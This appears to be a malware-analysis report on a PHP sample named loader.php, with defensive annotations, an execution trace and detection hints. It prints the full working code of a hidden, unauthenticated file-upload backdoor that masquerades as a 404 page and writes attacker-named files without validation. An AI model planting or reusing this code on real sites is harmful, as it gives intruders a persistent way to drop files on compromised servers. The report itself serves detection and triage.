PHP Malware Analysis

loader.php

md5: b90f98555d9ebc922f30c96f2882517c


Screenshot


Attributes

Environment

Files

Input


Deobfuscated PHP code

<?php

// Analyst notes (defensive reading of the sample): this is an unauthenticated
// file-drop page. No password, session or origin check exists; the only gate
// is the presence of the `cok` query parameter. Requests without it take the
// outer else branch at the bottom, which is the path the execution trace on
// this page recorded (a single header() call with status 404).
// Strings usable for log and content hunting, all taken from this listing:
// the `cok` query parameter, POST fields `nama` and `data`, the submit value
// "Gaskan", and the response texts "Success ! " and "Failed".
if (isset($_GET['cok'])) {
    // Upload form. The file input has no name attribute, so the browser does
    // not submit it as a file; the page's script copies the picked file's name
    // into the hidden `nama` field and its content into the hidden `data`
    // textarea. The form sets no enctype, so the payload travels as ordinary
    // POST fields and never shows up in $_FILES.
    echo "<form method=\"post\">";
    echo "<input type=\"file\" id=\"datanya\" onchange=\"setfilename(this.value)\"/>";
    echo "<input type=\"hidden\" name=\"nama\" id=\"namanya\">";
    echo "<textarea style=\"display: none\" id=\"output\" name=\"data\"></textarea>";
    echo "<input type=\"submit\" name=\"submit\" value=\"Gaskan\">";
    echo "</form>";
    if (isset($_POST['data'])) {
        // Both values are taken from the request as-is: the name is not
        // reduced to a basename or limited to an extension, and the content
        // is not inspected. $_POST['nama'] is read without an isset() check.
        $nama = $_POST['nama'];
        $data = $_POST['data'];
        // Creates or truncates the target relative to the current working
        // directory, then reopens it in "w" mode and writes the posted content.
        // No return value is checked. Because the name is used unmodified,
        // files written through this page are not necessarily confined to the
        // script's own directory; scope clean-up and timeline work accordingly.
        file_put_contents("./" . $nama, "");
        $cek = fopen("./" . $nama, "w");
        fwrite($cek, $data);
        fclose($cek);
        // Success is judged only by the path existing afterwards, which is
        // also true when the file was already there before the request.
        if (file_exists($nama)) {
            echo "Success ! ";
            // Rebuilds the current URL from HTTPS, HTTP_HOST and REQUEST_URI,
            // then replaces basename(REQUEST_URI) with the posted name so the
            // response contains a link to the written file. Host, URI and
            // name are echoed without HTML escaping.
            $link = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}";
            $link = str_replace(basename($_SERVER['REQUEST_URI']), $nama, $link);
            echo "<a href='" . $link . "'><b>" . $link . "</b></a>";
        } else {
            echo "Failed";
        }
    } else {
        // `cok` present but nothing posted: ask for a 404 status and print the
        // host's php_uname() string after the form. Output has already been
        // echoed above, so header() only takes effect when PHP is buffering
        // output; the `@` hides the warning otherwise. Detection hint: 404
        // responses for this path that still carry a body.
        @header('HTTP/1.0 404 Not Found', true, 404);
        echo "<b>" . php_uname();
    }
} else {
    // Default path: the PHP part emits nothing but the 404 status, so a plain
    // request to the file resembles a missing page. The static <script> that
    // follows the closing tag is still sent, as the "Generated HTML code"
    // section on this page shows.
    @header('HTTP/1.0 404 Not Found', true, 404);
}
?>
<script>
  // Client-side half of the upload form. setfilename() is wired to the file
  // input's onchange attribute: it strips any directory part (both "\" and "/"
  // separators) from the input's value and stores the remaining file name in
  // the hidden field with id "namanya", which the form submits as `nama`.
  // `filename` is assigned without a declaration, so it is an implicit global.
  function setfilename(val)
  {
    filename = val.split('\\').pop().split('/').pop();
    //filename = filename.substring(0, filename.lastIndexOf('.'));
    document.getElementById('namanya').value = filename;
  }
  
// These lookups run as soon as the script is parsed. When the PHP part did not
// render the form (no `cok` parameter) both return null and the
// addEventListener call below throws, so the script is inert on that path.
var input = document.getElementById("datanya");
var output = document.getElementById("output");


// On file selection, read the first picked file in the browser and copy its
// content into the hidden textarea (id "output"), which the form submits as
// the `data` field.
input.addEventListener("change", function () {
  if (this.files && this.files[0]) {
    var myFile = this.files[0];
    var reader = new FileReader();
    
    reader.addEventListener('load', function (e) {
      output.textContent = e.target.result;
    });
    
    // readAsBinaryString yields one character per byte of the file.
    // NOTE(review): whether non-text content survives the textarea and the
    // form encoding unchanged is not shown by this page.
    reader.readAsBinaryString(myFile);
  }   
});
</script>

Execution traces

data/traces/b90f98555d9ebc922f30c96f2882517c_trace-1676262787.0023.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:33:32.900100]
1	0	1	0.000132	393528
1	3	0	0.000225	405544	{main}	1		/var/www/html/uploads/loader.php	0	0
2	4	0	0.000242	405544	header	0		/var/www/html/uploads/loader.php	29	3	'HTTP/1.0 404 Not Found'	TRUE	404
2	4	1	0.000259	405680
2	4	R			NULL
1	3	1	0.000275	405568
			0.000301	314240
TRACE END   [2023-02-13 02:33:32.900296]


Generated HTML code

<html><head><script>
  function setfilename(val)
  {
    filename = val.split('\\').pop().split('/').pop();
    //filename = filename.substring(0, filename.lastIndexOf('.'));
    document.getElementById('namanya').value = filename;
  }
  
var input = document.getElementById("datanya");
var output = document.getElementById("output");


input.addEventListener("change", function () {
  if (this.files && this.files[0]) {
    var myFile = this.files[0];
    var reader = new FileReader();
    
    reader.addEventListener('load', function (e) {
      output.textContent = e.target.result;
    });
    
    reader.readAsBinaryString(myFile);
  }   
});
</script></head><body></body></html>

Original PHP code

<?php
// Sample as captured, annotated for triage. Behaviour in short: an
// unauthenticated upload page that stays silent (404 status only) unless the
// request carries a `cok` query parameter.
if (isset($_GET['cok'])) {
  // Form whose file input is unnamed; file name and content are submitted
  // through the hidden `nama` and `data` fields instead of a multipart upload.
  echo '<form method="post">';
  echo '<input type="file" id="datanya" onchange="setfilename(this.value)"/>';
  echo '<input type="hidden" name="nama" id="namanya">';
  echo '<textarea style="display: none" id="output" name="data"></textarea>';
  echo '<input type="submit" name="submit" value="Gaskan">';
  echo '</form>';
  if (isset($_POST['data'])) {
    // Request-supplied name and content, used without validation.
    $nama = $_POST['nama'];
    $data = $_POST['data'];
    // Truncate/create, then write the posted content to a path built from the
    // raw name, relative to the working directory. No error handling.
    file_put_contents("./".$nama, "");
    $cek = fopen("./".$nama, "w");
    fwrite($cek, $data);
    fclose($cek);
    if (file_exists($nama)) {
      echo "Success ! ";
      // Derives a URL for the written file from the current request and
      // prints it as a link; none of the parts are HTML-escaped.
      $link = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
      $link = str_replace(basename($_SERVER['REQUEST_URI']), $nama, $link);
      echo "<a href='".$link."'><b>".$link."</b></a>";
    } else {
      echo "Failed";
    }
  } else {
    // No upload in this request: 404 status is requested (after output has
    // already started, warning suppressed with `@`) and the php_uname()
    // string of the host is printed.
    @header('HTTP/1.0 404 Not Found', true, 404);
    echo "<b>".php_uname();
  }
} else {
  // Without `cok` the PHP part produces only the 404 status.
  @header('HTTP/1.0 404 Not Found', true, 404);
}
?>
<script>
  // Called from the file input's onchange attribute: keeps only the last path
  // component of the input's value and writes it to the hidden field with id
  // "namanya". `filename` is not declared, so it lands in the global scope.
  function setfilename(val)
  {
    filename = val.split('\\').pop().split('/').pop();
    //filename = filename.substring(0, filename.lastIndexOf('.'));
    document.getElementById('namanya').value = filename;
  }
  
// Looked up at parse time; both are null when the form was not rendered.
var input = document.getElementById("datanya");
var output = document.getElementById("output");


// Reads the first selected file in the browser and stores the result in the
// hidden textarea with id "output" once loading finishes.
input.addEventListener("change", function () {
  if (this.files && this.files[0]) {
    var myFile = this.files[0];
    var reader = new FileReader();
    
    reader.addEventListener('load', function (e) {
      output.textContent = e.target.result;
    });
    
    // Result is a binary string (one character per byte of the file).
    reader.readAsBinaryString(myFile);
  }   
});
</script>